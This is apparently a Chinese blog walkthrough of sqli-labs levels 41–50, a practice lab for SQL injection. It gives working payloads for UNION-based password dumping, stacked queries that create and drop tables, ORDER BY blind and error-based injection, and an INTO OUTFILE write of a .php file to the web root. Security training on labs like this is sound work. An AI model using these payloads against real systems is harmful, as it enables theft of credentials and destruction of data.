第四十一关

这关没有闭合符而且不报错,只能是否有回显来判断正误

爆表名:

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

爆内容:

?id=0 union select 1,2,group_concat(password) from users --+

同样也可以堆叠注入

?id=1;create table test like emails;--+

第四十二关

这关又是熟悉的post,思路也是一样,但是这关的username输入有mysqli_real_escape_string函数管着,所以注入点在password

添加表tesst

login_user=admin1&login_password=admin1';create table tesst(id INT,name varchar(100)) %23; &mysubmit=Login



删除表tesst

login_user=admin1&login_password=admin1';drop table tesst %23; &mysubmit=Login

第四十三关

这关就是闭合换成了'),其他一样



添加表tesst

login_user=admin1&login_password=admin1';create table tesst(id INT,name varchar(100)) %23; &mysubmit=Login

第四十四关

和四十二关一样,就是没有错误回显了

删除表tesst

login_user=admin1&login_password=admin1';drop table tesst %23; &mysubmit=Login

第四十五关

和四十三关闭合一样,然后没回显

创建test45表

login_user=admin1&login_password=admin1';create table test45(id INT,name varchar(100)) %23; &mysubmit=Login

第四十六关

这关又有新东西,利用order by来注入

后台语句是这样的

$sql = "SELECT * FROM users ORDER BY $id";

?sort=1 desc
?sort=1 asc

显示结果不同,说明可以注入

desc是 descend 降序意思

asc 是 ascend 升序意思

可利用 order by 后的一些参数进行注入

order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试

?sort=right(version(),1)
?sort=left(version(),1)



没有报错,但是 right 换成 left 都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。

此处可以直接构造 ?sort= 后面的一个参数

1.利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)

?sort=rand(true)
?sort=rand(false)





结果是不一样的

例子

?sort=rand(ascii(left(database(),1))=116)
?sort=rand(ascii(left(database(),1))=115)

对应上面的true和false,查看结果





可以进行布尔盲注

2.利用 and,例如 ?sort=1 and (加 sql 语句)。

同时,sql 语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。

例子

报错注入

?sort=1 and updatexml(1,concat(0x7e,database()),0) --+



时间注入

?sort=1 and if(ascii(substr(database(),1,1))=116,sleep(5),222)

异或布尔盲注

关于异或注入看这篇文章

https://www.anquanke.com/post/id/160584

异或运算规则:

1^1=0 0^0=0 0^1=1 1^1^1=0 1^1^0=0

id ^(select(select version()) regexp '^5')

也可以程序分析参数后注入

?sort=1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+



将查询结果导出到文件

?sort=1 into outfile 'C:\\phpStudy\\WWW\\sql\\Less-46\\123.php'





3.直接添加注入语句,?sort=(select ---)

?sort=right(version(),1)

第四十七关

这关闭合变成单引号。

获得数据库版本

?sort=1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+

第四十八关

这关是数字型盲注,没有报错回显。

时间注入

?sort=1 and if(ascii(substr(database(),1,1))=116,sleep(5),222)

第四十九关

这关是字符型盲注,没有报错回显。

?sort=1'  and If(ascii(substr(database(),1,1))=116,sleep(3),0)--+

第五十关

这关还是之前的堆叠注入

创建less50表

?sort=1;create table less50 like users;--+



参考文档:

https://blog.csdn.net/Kevinhanser/article/details/81563461

sqli-labs通关教程----41~50关的更多相关文章

  1. sqli-labs通关教程----21~30关

    第二十一关 第二十一关我们正常登陆后看到,uname后面变成了一堆字母 这是经过base64编码之后的样子,所以就照葫芦画瓢,将我payload的uname后面的部分转码成base64,这里可以用正常 ...

  2. sqli-labs通关教程----31~40关

    第三十一关 这关一样,闭合变成(",简单测试,#号不能用 ?id=1") and ("1")=("1")--+ 第三十二关 这关会把我们的输 ...

  3. SQL注入靶场sqli-labs 1-65关全部通关教程

    以前说好复习一遍 结果复习到10关就没继续了 真是废物 一点简单的事做不好 继续把以前有头没尾的事做完 以下为Sqli-lab的靶场全部通关答案 目录: less1-less10 less10-les ...

  4. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  5. DVWA File Upload 通关教程

    File Upload,即文件上传.文件上传漏洞通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁 ...

  6. DVWA XSS (Reflected) 通关教程

    XSS 介绍XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需 ...

  7. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  8. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  9. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

随机推荐

  1. Trie树-XOR-1695. Kanade的三重奏

    2020-03-18 21:58:18 问题描述: 给你一个数组A [1..n],你需要计算多少三元组(i,j,k)满足(i <j <k)和((A [i] xor A [j])<(A ...

  2. OpenLDAP 多主复制(基于docker容器模式部署)

    **本文主要讲述在docker环境下如何进行 OpenLDAP 多主复制,至于 OpenLDAP 原理可以先参考这篇文章了解:https://cloud.tencent.com/developer/a ...

  3. 微信内置浏览器对于html5的支持

    微信内置浏览器对于html5的支持 来源: 作者: 热度:102 日期:14-06-10, 09:10 AM 我在做针对微信的HTML5应用, 目前遇到的几个问题是 一. 安卓版微信直接调用系统浏览器 ...

  4. PyTorch专栏开篇

    目前研究人员正在使用的深度学习框架不尽相同,有 TensorFlow .PyTorch.Keras等.这些深度学习框架被应用于计算机视觉.语音识别.自然语言处理与生物信息学等领域,并获取了极好的效果. ...

  5. Python python 五种数据类型--字符串

    # python 字符串的初始化 var1 = 'hello,world' # python 字符串为不可变类型 var2= var1* 2 print(var1) #hello,world prin ...

  6. YII2自动初始化脚本

    #!/usr/bin/expect spawn ./init expect "Which environment do you want the application to be init ...

  7. C 2010年笔试题

    1 有一个函数, 写一段程序,输入的值,输出的值. #include <stdio.h> void main() { int x,y; printf("输入x:"); ...

  8. Spring Boot熟稔于心的20个常识

    1.什么是 Spring Boot? Spring Boot 是 Spring 开源组织下的子项目,是 Spring 组件一站式解决方案,主要是简化了使用 Spring 的难度,简省了繁重的配置,提供 ...

  9. 实验七 MySQL语言结构

    实验七 MySQL语言结构 一.  实验内容: 1. 常量的使用 2. 变量的使用 3. 运算符的使用 4. 系统函数的使用 二.  实验项目:员工管理数据库 用于企业管理的员工管理数据库,数据库名为 ...

  10. Chrome截图截满滑动栏,QQ截长屏,录屏

    1.Chrome截图截满滑动栏 一般我们截图都是用QQ的Ctrl+shift+A,但是网页不好截,这里我们可以用Chrome控制台来截全网页: F12或Ctrl+shift+i打开控制台: 点击一下控 ...